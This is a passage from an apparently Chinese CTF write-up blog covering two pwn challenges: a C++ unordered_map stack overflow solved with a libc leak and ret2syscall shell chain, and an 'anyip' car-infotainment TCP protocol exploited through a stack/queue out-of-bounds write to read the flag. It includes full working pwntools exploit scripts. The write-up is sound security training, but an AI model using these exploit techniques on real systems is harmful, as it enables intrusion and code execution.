</span></span><span style=display:flex><span>    <span style=color:#a2f;font-weight:700>for</span> i <span style=color:#a2f;font-weight:700>in</span> <span style=color:#a2f>range</span>(<span style=color:#666>0x1f</span>):
</span></span><span style=display:flex><span>        part1(i<span style=color:#666>*</span>j,<span style=color:#666>10</span>)
</span></span><span style=display:flex><span>    part2(j)
</span></span><span style=display:flex><span>    p<span style=color:#666>.</span>recvuntil(<span style=color:#b44>&#39;as follows:&#39;</span>)
</span></span><span style=display:flex><span>    p<span style=color:#666>.</span>recvline()
</span></span><span style=display:flex><span>    p<span style=color:#666>.</span>recvline()
</span></span><span style=display:flex><span>    data<span style=color:#666>=</span>p<span style=color:#666>.</span>recvline()
</span></span><span style=display:flex><span>    <span style=color:#a2f;font-weight:700>if</span>(data <span style=color:#666>!=</span><span style=color:#b44>b</span><span style=color:#b44>&#39;</span><span style=color:#b62;font-weight:700>\n</span><span style=color:#b44>&#39;</span>):
</span></span><span style=display:flex><span>        <span style=color:#a2f>print</span>(j)
</span></span><span style=display:flex><span>        pause()
</span></span></code></pre></div><p><img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/84.png alt></p><p><img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/85.png alt></p><p><strong>剩下的就是构造exp了，一开始author让我们输入0x80字节长度的数据（一种栈迁移的提示），同时这个magic_gadget可以控制rsp,显然的栈迁移。</strong></p><p><strong>但注意到这个copy不是按照idx顺序来的，比如59,59*2顺序，但是通过调试看栈上的数据排布可以得出每个idx对应复制到栈上的哪个位置。</strong></p><p><strong>剩下的exp构造就很简单了，只是要注意不要直接用system函数，因为这个函数调用时会降低rsp，会降低0x600左右，因为rsp此时指向bss，再往下降就降到了不可写的段，而system需要往rsp上写东西，此时就会崩掉。因此直接用ret2syscall就可以了</strong></p><div class=highlight><pre tabindex=0 style=background-color:#f8f8f8;-moz-tab-size:1;-o-tab-size:1;tab-size:1><code class=language-python data-lang=python><span style=display:flex><span><span style=color:#a2f;font-weight:700>from</span> <span style=color:#00f;font-weight:700>pwnlib.util.packing</span> <span style=color:#a2f;font-weight:700>import</span> u64
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>from</span> <span style=color:#00f;font-weight:700>pwnlib.util.packing</span> <span style=color:#a2f;font-weight:700>import</span> u32
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>from</span> <span style=color:#00f;font-weight:700>pwnlib.util.packing</span> <span style=color:#a2f;font-weight:700>import</span> u16
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>from</span> <span style=color:#00f;font-weight:700>pwnlib.util.packing</span> <span style=color:#a2f;font-weight:700>import</span> u8
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>from</span> <span style=color:#00f;font-weight:700>pwnlib.util.packing</span> <span style=color:#a2f;font-weight:700>import</span> p64
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>from</span> <span style=color:#00f;font-weight:700>pwnlib.util.packing</span> <span style=color:#a2f;font-weight:700>import</span> p32
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>from</span> <span style=color:#00f;font-weight:700>pwnlib.util.packing</span> <span style=color:#a2f;font-weight:700>import</span> p16
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>from</span> <span style=color:#00f;font-weight:700>pwnlib.util.packing</span> <span style=color:#a2f;font-weight:700>import</span> p8
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>from</span> <span style=color:#00f;font-weight:700>pwn</span> <span style=color:#a2f;font-weight:700>import</span> <span style=color:#666>*</span>
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>from</span> <span style=color:#00f;font-weight:700>ctypes</span> <span style=color:#a2f;font-weight:700>import</span> <span style=color:#666>*</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>context(os<span style=color:#666>=</span><span style=color:#b44>&#39;linux&#39;</span>, arch<span style=color:#666>=</span><span style=color:#b44>&#39;amd64&#39;</span>, log_level<span style=color:#666>=</span><span style=color:#b44>&#39;debug&#39;</span>)
</span></span><span style=display:flex><span>p <span style=color:#666>=</span> process(<span style=color:#b44>&#34;/home/zp9080/PWN/novel1&#34;</span>)
</span></span><span style=display:flex><span><span style=color:#080;font-style:italic># p=gdb.debug(&#34;/home/zp9080/PWN/pwn&#34;,&#39;b *$rebase(0x117F)&#39;)</span>
</span></span><span style=display:flex><span><span style=color:#080;font-style:italic># p=remote(&#39;139.155.126.78&#39;,31415)</span>
</span></span><span style=display:flex><span><span style=color:#080;font-style:italic># p=process([&#39;seccomp-tools&#39;,&#39;dump&#39;,&#39;/home/zp9080/PWN/pwn&#39;])</span>
</span></span><span style=display:flex><span>elf <span style=color:#666>=</span> ELF(<span style=color:#b44>&#34;/home/zp9080/PWN/novel1&#34;</span>)
</span></span><span style=display:flex><span>libc<span style=color:#666>=</span>elf<span style=color:#666>.</span>libc 
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>gdb_script<span style=color:#666>=</span><span style=color:#b44>&#39;&#39;&#39;
</span></span></span><span style=display:flex><span><span style=color:#b44>b *0x402CCF
</span></span></span><span style=display:flex><span><span style=color:#b44>&#39;&#39;&#39;</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>def</span> <span style=color:#00a000>dbg</span>():
</span></span><span style=display:flex><span>    gdb<span style=color:#666>.</span>attach(p,gdb_script)
</span></span><span style=display:flex><span>    pause()
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>menu<span style=color:#666>=</span><span style=color:#b44>b</span><span style=color:#b44>&#39;Chapter: &#39;</span>
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>def</span> <span style=color:#00a000>part1</span>(idx,value):
</span></span><span style=display:flex><span>    p<span style=color:#666>.</span>sendlineafter(menu,<span style=color:#a2f>str</span>(<span style=color:#666>1</span>))
</span></span><span style=display:flex><span>    p<span style=color:#666>.</span>sendlineafter(<span style=color:#b44>&#39;Blood:&#39;</span>,<span style=color:#a2f>str</span>(idx))
</span></span><span style=display:flex><span>    p<span style=color:#666>.</span>sendlineafter(<span style=color:#b44>&#39;Evidence:&#39;</span>,<span style=color:#a2f>str</span>(value))
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>def</span> <span style=color:#00a000>part2</span>(idx):
</span></span><span style=display:flex><span>    p<span style=color:#666>.</span>sendlineafter(menu,<span style=color:#a2f>str</span>(<span style=color:#666>2</span>))
</span></span><span style=display:flex><span>    p<span style=color:#666>.</span>sendlineafter(<span style=color:#b44>&#39;Blood:&#39;</span>,<span style=color:#a2f>str</span>(idx))
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>pop_rdi_rbp<span style=color:#666>=</span><span style=color:#666>0x4025C0</span>
</span></span><span style=display:flex><span>pop_rsi_rbp<span style=color:#666>=</span><span style=color:#666>0x40494e</span>
</span></span><span style=display:flex><span>puts_got<span style=color:#666>=</span>elf<span style=color:#666>.</span>got[<span style=color:#b44>&#39;puts&#39;</span>]
</span></span><span style=display:flex><span>puts<span style=color:#666>=</span>elf<span style=color:#666>.</span>plt[<span style=color:#b44>&#39;puts&#39;</span>]
</span></span><span style=display:flex><span>author<span style=color:#666>=</span><span style=color:#666>0x40A540</span><span style=color:#666>-</span><span style=color:#666>0x10</span>
</span></span><span style=display:flex><span>magic<span style=color:#666>=</span><span style=color:#666>0x4025BE</span>
</span></span><span style=display:flex><span>my_gets<span style=color:#666>=</span><span style=color:#666>0x40283C</span> <span style=color:#080;font-style:italic>#read(0,author,0x80)</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>payload<span style=color:#666>=</span>p64(pop_rdi_rbp)<span style=color:#666>+</span>p64(puts_got)<span style=color:#666>+</span>p64(<span style=color:#666>0</span>)<span style=color:#666>+</span>p64(puts)
</span></span><span style=display:flex><span>payload<span style=color:#666>+=</span>p64(my_gets)<span style=color:#666>+</span>p64(<span style=color:#666>0</span>)<span style=color:#666>+</span>p64(my_gets)<span style=color:#666>+</span>p64(<span style=color:#666>0</span>)
</span></span><span style=display:flex><span>p<span style=color:#666>.</span>sendlineafter(<span style=color:#b44>&#39;Author:&#39;</span>,payload)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>for</span> i <span style=color:#a2f;font-weight:700>in</span> <span style=color:#a2f>range</span>(<span style=color:#666>19</span>):
</span></span><span style=display:flex><span>    part1(<span style=color:#666>59</span><span style=color:#666>*</span>i,<span style=color:#666>10</span>)
</span></span><span style=display:flex><span>part1(<span style=color:#666>59</span><span style=color:#666>*</span><span style=color:#666>19</span>,magic)
</span></span><span style=display:flex><span>part1(<span style=color:#666>59</span><span style=color:#666>*</span><span style=color:#666>20</span>,author)
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>for</span> i <span style=color:#a2f;font-weight:700>in</span> <span style=color:#a2f>range</span>(<span style=color:#666>21</span>,<span style=color:#666>30</span>):
</span></span><span style=display:flex><span>    part1(<span style=color:#666>59</span><span style=color:#666>*</span>i,<span style=color:#666>10</span>)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#080;font-style:italic># dbg()</span>
</span></span><span style=display:flex><span>part2(<span style=color:#666>59</span>)
</span></span><span style=display:flex><span>libcbase<span style=color:#666>=</span>u64(p<span style=color:#666>.</span>recvuntil(<span style=color:#b44>&#39;</span><span style=color:#b62;font-weight:700>\x7f</span><span style=color:#b44>&#39;</span>)[<span style=color:#666>-</span><span style=color:#666>6</span>:]<span style=color:#666>.</span>ljust(<span style=color:#666>8</span>, <span style=color:#b44>b</span><span style=color:#b44>&#39;</span><span style=color:#b62;font-weight:700>\x00</span><span style=color:#b44>&#39;</span>))<span style=color:#666>-</span>libc<span style=color:#666>.</span>sym[<span style=color:#b44>&#39;puts&#39;</span>]
</span></span><span style=display:flex><span><span style=color:#a2f>print</span>(<span style=color:#a2f>hex</span>(libcbase))
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>rdi <span style=color:#666>=</span> libcbase <span style=color:#666>+</span> <span style=color:#666>0x2a3e5</span>
</span></span><span style=display:flex><span>rsi <span style=color:#666>=</span> libcbase <span style=color:#666>+</span> <span style=color:#666>0x2be51</span>
</span></span><span style=display:flex><span>rdx_rbx <span style=color:#666>=</span> libcbase <span style=color:#666>+</span> <span style=color:#666>0x904a9</span>
</span></span><span style=display:flex><span>rax <span style=color:#666>=</span> libcbase <span style=color:#666>+</span> <span style=color:#666>0x45eb0</span>
</span></span><span style=display:flex><span>bin_addr <span style=color:#666>=</span> libcbase <span style=color:#666>+</span> <span style=color:#a2f>next</span>(libc<span style=color:#666>.</span>search(<span style=color:#b44>b</span><span style=color:#b44>&#39;/bin/sh&#39;</span>))
</span></span><span style=display:flex><span>syscall<span style=color:#666>=</span>libcbase<span style=color:#666>+</span><span style=color:#666>0x0000000000029db4</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>pay<span style=color:#666>=</span>p64(rdi) <span style=color:#666>+</span> p64(bin_addr) <span style=color:#666>+</span> p64(rsi) <span style=color:#666>+</span> p64(<span style=color:#666>0</span>) <span style=color:#666>+</span> p64(rdx_rbx) <span style=color:#666>+</span> p64(<span style=color:#666>0</span>) <span style=color:#666>*</span> <span style=color:#666>2</span> <span style=color:#666>+</span> p64(rax) <span style=color:#666>+</span> p64(<span style=color:#666>0x3b</span>) <span style=color:#666>+</span> p64(syscall)
</span></span><span style=display:flex><span>p<span style=color:#666>.</span>sendline(pay)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>p<span style=color:#666>.</span>interactive()
</span></span></code></pre></div><p>最后打通 <img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/86.png alt></p><h2 id=一些思考>一些思考
<a class=header-anchor href=#%e4%b8%80%e4%ba%9b%e6%80%9d%e8%80%83></a></h2><p>这个题主要是要理解C++中的unordered map、bucket相关内容，其中C++也没有去除符号表，所以很多可以直接复制相应的反汇编问大模型，大模型基本都可以很好地解释函数的作用，而且这个题栈溢出很明显，从保护再到反汇编的copy函数，一眼栈溢出。</p><p>这个题还还有个有意思的地方就是对在同一个bucket中的idx的爆破，也算是个小fuzz，同时要理解bucket相关内容才知道如何爆破idx</p><h1 id=anyip>anyip
<a class=header-anchor href=#anyip></a></h1><p>题目描述：某个车机车载娱乐系统ivi开放了个tcp的接口,你能通过这个tcp端口逆向出具体的协议格式并获取它的权限吗</p><p><strong>逆向出来的pack结构，这个部分还比较容易</strong></p><div class=highlight><pre tabindex=0 style=background-color:#f8f8f8;-moz-tab-size:1;-o-tab-size:1;tab-size:1><code class=language-python data-lang=python><span style=display:flex><span><span style=color:#a2f;font-weight:700>def</span> <span style=color:#00a000>pack</span>(func, para1, content):
</span></span><span style=display:flex><span>    buf <span style=color:#666>=</span> <span style=color:#b44>b</span><span style=color:#b44>&#34;&#34;</span>
</span></span><span style=display:flex><span>    buf <span style=color:#666>+=</span> p16(func)
</span></span><span style=display:flex><span>    buf <span style=color:#666>+=</span> <span style=color:#b44>b</span><span style=color:#b44>&#34;</span><span style=color:#b62;font-weight:700>\x00</span><span style=color:#b44>&#34;</span> <span style=color:#666>+</span> p8(para1) <span style=color:#666>+</span> <span style=color:#b44>b</span><span style=color:#b44>&#34;</span><span style=color:#b62;font-weight:700>\x00</span><span style=color:#b44>&#34;</span> <span style=color:#666>*</span> (<span style=color:#666>4</span>) <span style=color:#666>+</span> <span style=color:#b44>b</span><span style=color:#b44>&#34;</span><span style=color:#b62;font-weight:700>\x00\x00\x00\x00\x01\x07\x00\x00</span><span style=color:#b44>&#34;</span>
</span></span><span style=display:flex><span>    buf <span style=color:#666>+=</span> content
</span></span><span style=display:flex><span>    <span style=color:#a2f;font-weight:700>return</span> buf
</span></span></code></pre></div><p>前16位代表要调用的函数，取值为0x1111,0x2222,0x3333,0x4444，代表四个函数。</p><p>它后面的8位是函数的一个参数。再后面的8位固定为b"\x??\x??\x??\x??\x01\x07\x??\x??"。如果其中的\x01和\x07不对会直接报错。再后面的content为可变长度的字节流，也会作为部分函数的参数。</p><p>0x4444函数,实现了一个队列 <img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/87.png alt></p><p>0x2222函数，实现了一个栈.<strong>但注意到PUSH的时候是有检查的，但是POP的时候没有检查，那么stackTop就可以变为负数实现溢出</strong> <img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/88.png alt></p><p>可以看到相关结构存储如下，<strong>通过这个负数溢出可以修改qFront，qEnd,QUEUE这些结构</strong> <img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/89.png alt></p><p><strong>stack的前面有queue及其队头队尾，将栈pop到qEnd的位置后再push入数字就可以覆盖qEnd。</strong></p><p><strong>qEnd = (qEnd+1) %10是入队之后才会进行的，也就是说qEnd被覆盖后的第一次入队，偏移完全由刚刚越界push的数字决定。但由于只有一次，不能完整覆盖s。但是发现栈对top的唯一检查就是top- base != 0xa, 所以只要把base覆盖掉，栈就可以任意偏移写了。</strong></p><p><strong>下面有一个字符数组s，其中存的是log文件的名字，func 0x1111中有将log读出并发送的功能，所以如果通过栈的任意偏移写将log的名字覆盖成flag，再用func 0x1111中的功能就可以得到flag了。</strong> <img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/90.png alt></p><p>接下来要让让v13=“SomeIpfun”，这部分要逆向0x3333函数，我自己没有太逆懂这是个什么结构。于是想是否可以试试小fuzz。</p><p>先按SomeIpfun的顺序输出，发现拼接出的字符串是uenoISpmf 一一对应：</p><p>S o m e I p f u n</p><p>u e n o I S p m f</p><p>以u来说，第八个输入的u会在第一个输出，而目标是让S第一个输出，所以只要把输入时的u改成S即可。以此类推，修改顺序为：peuoIfnSm，得到的字符串就是SomeIpfun了。</p><p><strong>c++的字符串不用\x00结尾，如果加了反而会让长度增加导致compare结果不相等</strong></p><p>总结以上利用，写出exp：</p><ol><li>用栈的负向溢出覆盖q_end</li><li>用queue越界覆盖stack的base，让栈绕过边界检查</li><li>用stack越界覆盖s，将文件名改成flag</li><li>通过func0x3333和0x1111中的功能，构造字符串"SomeIpfun", 得到flag（在发回的报文中）</li></ol><div class=highlight><pre tabindex=0 style=background-color:#f8f8f8;-moz-tab-size:1;-o-tab-size:1;tab-size:1><code class=language-python data-lang=python><span style=display:flex><span><span style=color:#a2f;font-weight:700>from</span> <span style=color:#00f;font-weight:700>pwnlib.util.packing</span> <span style=color:#a2f;font-weight:700>import</span> u64
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>from</span> <span style=color:#00f;font-weight:700>pwnlib.util.packing</span> <span style=color:#a2f;font-weight:700>import</span> u32
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>from</span> <span style=color:#00f;font-weight:700>pwnlib.util.packing</span> <span style=color:#a2f;font-weight:700>import</span> u16
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>from</span> <span style=color:#00f;font-weight:700>pwnlib.util.packing</span> <span style=color:#a2f;font-weight:700>import</span> u8
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>from</span> <span style=color:#00f;font-weight:700>pwnlib.util.packing</span> <span style=color:#a2f;font-weight:700>import</span> p64
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>from</span> <span style=color:#00f;font-weight:700>pwnlib.util.packing</span> <span style=color:#a2f;font-weight:700>import</span> p32
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>from</span> <span style=color:#00f;font-weight:700>pwnlib.util.packing</span> <span style=color:#a2f;font-weight:700>import</span> p16
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>from</span> <span style=color:#00f;font-weight:700>pwnlib.util.packing</span> <span style=color:#a2f;font-weight:700>import</span> p8
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>from</span> <span style=color:#00f;font-weight:700>pwn</span> <span style=color:#a2f;font-weight:700>import</span> <span style=color:#666>*</span>
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>from</span> <span style=color:#00f;font-weight:700>ctypes</span> <span style=color:#a2f;font-weight:700>import</span> <span style=color:#666>*</span>
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>import</span> <span style=color:#00f;font-weight:700>os</span>
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>import</span> <span style=color:#00f;font-weight:700>socket</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>def</span> <span style=color:#00a000>pack</span>(func, para1, content):
</span></span><span style=display:flex><span>    buf <span style=color:#666>=</span> <span style=color:#b44>b</span><span style=color:#b44>&#34;&#34;</span>
</span></span><span style=display:flex><span>    buf <span style=color:#666>+=</span> p16(func)
</span></span><span style=display:flex><span>    buf <span style=color:#666>+=</span> <span style=color:#b44>b</span><span style=color:#b44>&#34;</span><span style=color:#b62;font-weight:700>\x00</span><span style=color:#b44>&#34;</span> <span style=color:#666>+</span> p8(para1) <span style=color:#666>+</span> <span style=color:#b44>b</span><span style=color:#b44>&#34;</span><span style=color:#b62;font-weight:700>\x00</span><span style=color:#b44>&#34;</span> <span style=color:#666>*</span> (<span style=color:#666>4</span>) <span style=color:#666>+</span> <span style=color:#b44>b</span><span style=color:#b44>&#34;</span><span style=color:#b62;font-weight:700>\x00\x00\x00\x00\x01\x07\x00\x00</span><span style=color:#b44>&#34;</span>
</span></span><span style=display:flex><span>    buf <span style=color:#666>+=</span> content
</span></span><span style=display:flex><span>    <span style=color:#a2f;font-weight:700>return</span> buf
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>def</span> <span style=color:#00a000>push</span>(num):
</span></span><span style=display:flex><span>    p1 <span style=color:#666>=</span> pack(<span style=color:#666>0x2222</span>, <span style=color:#666>1</span>, <span style=color:#a2f>str</span>(num)<span style=color:#666>.</span>encode())
</span></span><span style=display:flex><span>    <span style=color:#a2f;font-weight:700>return</span> p1
</span></span><span style=display:flex><span>    
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>def</span> <span style=color:#00a000>pop</span>():
</span></span><span style=display:flex><span>    p1 <span style=color:#666>=</span> pack(<span style=color:#666>0x2222</span>, <span style=color:#666>2</span>, <span style=color:#b44>b</span><span style=color:#b44>&#34;&#34;</span>)
</span></span><span style=display:flex><span>    <span style=color:#a2f;font-weight:700>return</span> p1
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>def</span> <span style=color:#00a000>enqueue</span>(num):
</span></span><span style=display:flex><span>    p1 <span style=color:#666>=</span> pack(<span style=color:#666>0x4444</span>, <span style=color:#666>1</span>, <span style=color:#a2f>str</span>(num)<span style=color:#666>.</span>encode())
</span></span><span style=display:flex><span>    <span style=color:#a2f;font-weight:700>return</span> p1
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>s1 <span style=color:#666>=</span> socket<span style=color:#666>.</span>socket()
</span></span><span style=display:flex><span>s1<span style=color:#666>.</span>connect((<span style=color:#b44>&#34;127.0.0.1&#34;</span>, <span style=color:#666>9999</span>))
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>for</span> i <span style=color:#a2f;font-weight:700>in</span> <span style=color:#a2f>range</span>(<span style=color:#666>0x20</span> <span style=color:#666>//</span> <span style=color:#666>4</span> <span style=color:#666>-</span> <span style=color:#666>3</span>):
</span></span><span style=display:flex><span>    s1<span style=color:#666>.</span>send(pop())
</span></span><span style=display:flex><span>    <span style=color:#a2f>print</span>(s1<span style=color:#666>.</span>recv(<span style=color:#666>0x10</span>))
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>s1<span style=color:#666>.</span>send(push((<span style=color:#666>0xCC</span> <span style=color:#666>-</span> <span style=color:#666>0x60</span>) <span style=color:#666>//</span> <span style=color:#666>4</span>))
</span></span><span style=display:flex><span><span style=color:#a2f>print</span>(s1<span style=color:#666>.</span>recv(<span style=color:#666>0x10</span>))
</span></span><span style=display:flex><span>s1<span style=color:#666>.</span>send(enqueue(<span style=color:#666>0x40</span>))
</span></span><span style=display:flex><span><span style=color:#a2f>print</span>(s1<span style=color:#666>.</span>recv(<span style=color:#666>0x10</span>))
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#a2f;font-weight:700>for</span> i <span style=color:#a2f;font-weight:700>in</span> <span style=color:#a2f>range</span>((<span style=color:#666>0xC8</span> <span style=color:#666>-</span> <span style=color:#666>0x90</span>) <span style=color:#666>//</span> <span style=color:#666>4</span>):
</span></span><span style=display:flex><span>    s1<span style=color:#666>.</span>send(push(<span style=color:#666>0</span>))
</span></span><span style=display:flex><span>    <span style=color:#a2f>print</span>(s1<span style=color:#666>.</span>recv(<span style=color:#666>0x10</span>))
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>s1<span style=color:#666>.</span>send(push((<span style=color:#666>0xE0</span> <span style=color:#666>-</span> <span style=color:#666>0xA0</span>) <span style=color:#666>//</span> <span style=color:#666>4</span>))
</span></span><span style=display:flex><span><span style=color:#a2f>print</span>(s1<span style=color:#666>.</span>recv(<span style=color:#666>0x10</span>))
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#080;font-style:italic>#flag</span>
</span></span><span style=display:flex><span>s1<span style=color:#666>.</span>send(push(<span style=color:#666>0x67616C66</span>))
</span></span><span style=display:flex><span><span style=color:#a2f>print</span>(s1<span style=color:#666>.</span>recv(<span style=color:#666>0x10</span>))
</span></span><span style=display:flex><span>s1<span style=color:#666>.</span>send(push(<span style=color:#666>0</span>))
</span></span><span style=display:flex><span><span style=color:#a2f>print</span>(s1<span style=color:#666>.</span>recv(<span style=color:#666>0x10</span>))
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>p1 <span style=color:#666>=</span> pack(<span style=color:#666>0x3333</span>, <span style=color:#666>3</span>, <span style=color:#b44>b</span><span style=color:#b44>&#34;p&#34;</span>)
</span></span><span style=display:flex><span>s1<span style=color:#666>.</span>send(p1)
</span></span><span style=display:flex><span><span style=color:#a2f>print</span>(s1<span style=color:#666>.</span>recv(<span style=color:#666>0x10</span>))
</span></span><span style=display:flex><span>p1 <span style=color:#666>=</span> pack(<span style=color:#666>0x3333</span>, <span style=color:#666>1</span>, <span style=color:#b44>b</span><span style=color:#b44>&#34;e&#34;</span>)
</span></span><span style=display:flex><span>s1<span style=color:#666>.</span>send(p1)
</span></span><span style=display:flex><span><span style=color:#a2f>print</span>(s1<span style=color:#666>.</span>recv(<span style=color:#666>0x10</span>))
</span></span><span style=display:flex><span>p1 <span style=color:#666>=</span> pack(<span style=color:#666>0x3333</span>, <span style=color:#666>1</span>, <span style=color:#b44>b</span><span style=color:#b44>&#34;u&#34;</span>)
</span></span><span style=display:flex><span>s1<span style=color:#666>.</span>send(p1)
</span></span><span style=display:flex><span><span style=color:#a2f>print</span>(s1<span style=color:#666>.</span>recv(<span style=color:#666>0x10</span>))
</span></span><span style=display:flex><span>p1 <span style=color:#666>=</span> pack(<span style=color:#666>0x3333</span>, <span style=color:#666>1</span>, <span style=color:#b44>b</span><span style=color:#b44>&#34;o&#34;</span>)
</span></span><span style=display:flex><span>s1<span style=color:#666>.</span>send(p1)
</span></span><span style=display:flex><span><span style=color:#a2f>print</span>(s1<span style=color:#666>.</span>recv(<span style=color:#666>0x10</span>))
</span></span><span style=display:flex><span>p1 <span style=color:#666>=</span> pack(<span style=color:#666>0x3333</span>, <span style=color:#666>1</span>, <span style=color:#b44>b</span><span style=color:#b44>&#34;I&#34;</span>)
</span></span><span style=display:flex><span>s1<span style=color:#666>.</span>send(p1)
</span></span><span style=display:flex><span><span style=color:#a2f>print</span>(s1<span style=color:#666>.</span>recv(<span style=color:#666>0x10</span>))
</span></span><span style=display:flex><span>p1 <span style=color:#666>=</span> pack(<span style=color:#666>0x3333</span>, <span style=color:#666>1</span>, <span style=color:#b44>b</span><span style=color:#b44>&#34;f&#34;</span>)
</span></span><span style=display:flex><span>s1<span style=color:#666>.</span>send(p1)
</span></span><span style=display:flex><span><span style=color:#a2f>print</span>(s1<span style=color:#666>.</span>recv(<span style=color:#666>0x10</span>))
</span></span><span style=display:flex><span>p1 <span style=color:#666>=</span> pack(<span style=color:#666>0x3333</span>, <span style=color:#666>1</span>, <span style=color:#b44>b</span><span style=color:#b44>&#34;n&#34;</span>)
</span></span><span style=display:flex><span>s1<span style=color:#666>.</span>send(p1)
</span></span><span style=display:flex><span><span style=color:#a2f>print</span>(s1<span style=color:#666>.</span>recv(<span style=color:#666>0x10</span>))
</span></span><span style=display:flex><span>p1 <span style=color:#666>=</span> pack(<span style=color:#666>0x3333</span>, <span style=color:#666>1</span>, <span style=color:#b44>b</span><span style=color:#b44>&#34;S&#34;</span>)
</span></span><span style=display:flex><span>s1<span style=color:#666>.</span>send(p1)
</span></span><span style=display:flex><span><span style=color:#a2f>print</span>(s1<span style=color:#666>.</span>recv(<span style=color:#666>0x10</span>))
</span></span><span style=display:flex><span>p1 <span style=color:#666>=</span> pack(<span style=color:#666>0x3333</span>, <span style=color:#666>1</span>, <span style=color:#b44>b</span><span style=color:#b44>&#34;m&#34;</span>)
</span></span><span style=display:flex><span>s1<span style=color:#666>.</span>send(p1)
</span></span><span style=display:flex><span><span style=color:#a2f>print</span>(s1<span style=color:#666>.</span>recv(<span style=color:#666>0x10</span>))
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>p2 <span style=color:#666>=</span> pack(<span style=color:#666>0x1111</span>, <span style=color:#666>2</span>, <span style=color:#b44>b</span><span style=color:#b44>&#34;a&#34;</span> <span style=color:#666>*</span> (<span style=color:#666>0x4B</span> <span style=color:#666>-</span> <span style=color:#666>9</span>) <span style=color:#666>+</span> <span style=color:#b44>b</span><span style=color:#b44>&#34;SomeIpfun&#34;</span> <span style=color:#666>+</span> <span style=color:#b44>b</span><span style=color:#b44>&#34;b&#34;</span> <span style=color:#666>*</span> <span style=color:#666>0x100</span>)
</span></span><span style=display:flex><span>s1<span style=color:#666>.</span>send(p2)
</span></span><span style=display:flex><span><span style=color:#a2f>print</span>(s1<span style=color:#666>.</span>recv(<span style=color:#666>0x200</span>))
</span></span></code></pre></div><p>最后打通
<img src=/imgs/img-lazy-loading.gif data-src=/imgs/photos3/91.png alt></p><p><strong>不好逆向的要多想想fuzz，说不定就试出来了。同时要对漏洞敏感，比如这种题，没有给libc，基本不用想leak出libcbase来执行system。因此要格外注意越界，以及文件中是否有与文件相关的，或者popen这种命令执行的函数，从这个出发点来进行攻击</strong></p></div><footer class=post-footer><div class=post-tags><a href=/tags/></a></div><div class=addthis_inline_share_toolbox style=text-align:center></div><hr><div class=reward-container><div><i class="fa-solid fa-mug-hot"></i>请我喝杯咖啡吧 ヾ(^▽^*)))</div><button>
赞赏</button><div class=post-reward><div class=post-reward-item><img src=/imgs/img-lazy-loading.gif data-src=/imgs/ali-pay.png alt="f1ow - 支付宝">
<span>支付宝</span></div><div class=post-reward-item><img src=/imgs/img-lazy-loading.gif data-src=/imgs/wechat-pay.png alt="f1ow - 微信">
<span>微信</span></div></div></div><div class=post-copyright><img src=/imgs/cc/cc.svg width=75 height=75 align=right alt=共享知识><ul><li class=post-copyright-title><strong>文章标题：</strong>
CCBCISCN初赛</li><li class=post-copyright-author><strong>本文作者： </strong>f1ow</li><li class=post-copyright-link><strong>本文链接：</strong>
